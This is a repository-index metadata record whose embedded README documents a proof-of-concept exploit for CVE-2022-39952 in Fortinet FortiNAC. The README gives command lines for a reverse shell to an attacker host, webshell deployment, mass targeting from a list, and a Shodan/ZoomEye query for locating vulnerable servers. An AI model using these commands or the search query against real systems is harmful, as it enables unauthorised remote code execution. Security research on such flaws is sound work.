{"id":22799840,"url":"https://github.com/chocapikk/cve-2022-39952","last_synced_at":"2025-04-30T19:32:56.668Z","repository":{"id":133506542,"uuid":"606840385","full_name":"Chocapikk/CVE-2022-39952","owner":"Chocapikk","description":"PoC for CVE-2022-39952 affecting Fortinet FortiNAC.","archived":false,"fork":false,"pushed_at":"2023-02-26T18:13:50.000Z","size":4,"stargazers_count":3,"open_issues_count":0,"forks_count":1,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-03-30T19:17:15.997Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Chocapikk.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2023-02-26T18:10:04.000Z","updated_at":"2025-01-27T23:59:38.000Z","dependencies_parsed_at":"2023-11-13T11:27:35.360Z","dependency_job_id":"0d5aeee6-3cae-4edb-af3e-90a20d5834c1","html_url":"https://github.com/Chocapikk/CVE-2022-39952","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Chocapikk%2FCVE-2022-39952","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Chocapikk%2FCVE-2022-39952/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Chocapikk%2FCVE-2022-39952/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Chocapikk%2FCVE-2022-39952/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Chocapikk","download_url":"https://codeload.github.com/Chocapikk/CVE-2022-39952/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":251769529,"owners_count":21640921,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-12-12T07:10:07.213Z","updated_at":"2025-04-30T19:32:56.637Z","avatar_url":"https://github.com/Chocapikk.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# FortiNAC CVE-2022-39952\n\n## PoC for CVE-2022-39952 affecting Fortinet FortiNAC.\n\n\u003e This exploit allows an attacker to execute arbitrary commands on the FortiNAC server. It is based on the PoC developed by [horizon3ai](https://github.com/horizon3ai/CVE-2022-39952), with additional options for targeting multiple hosts.\n\n\u003e Disclaimer: This exploit is for educational purposes only. Please use responsibly and with permission.\n\n## Usage:\n\n```bash\nusage: exploit.py [-h] [-t TARGET] [-l LIST] [-lh LHOST] [-lp LPORT]\n\noptions:\n  -h, --help            show this help message and exit\n  -t TARGET, --target TARGET\n                        The IP address of the target\n  -l LIST, --list LIST  List of targets\n  -lh LHOST, --lhost LHOST\n                        The local host for the reverse shell\n  -lp LPORT, --lport LPORT\n                        The local port for the reverse shell\n```\n\nTo use this exploit, you must have Python 3.x installed on your system.\n\n## Requirements:\n    Python 3.x\n    requests module\n    concurrent.futures module\n\n## Examples:\n\n### Execute a reverse shell on a single target:\n```bash\n$ python exploit.py -t 192.168.1.100 -lh 192.168.1.10 -lp 4444\n```\n\n### Execute a webshell on a single target:\n```\n$ python exploit.py -t 192.168.1.100\n```\n\n### Execute a webshell on multiple targets from a list:\n```bash\n$ python exploit.py -l targets.txt\n```\n\n## Note:\n\n\u003eThis exploit has only been tested on a limited number of targets, so its effectiveness may vary. The dork for finding potential targets on ZoomEye and Shodan is:\n\n`title:\"FortiNAC\" +\"JSESSIONID\"`\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fchocapikk%2Fcve-2022-39952","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fchocapikk%2Fcve-2022-39952","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fchocapikk%2Fcve-2022-39952/lists"}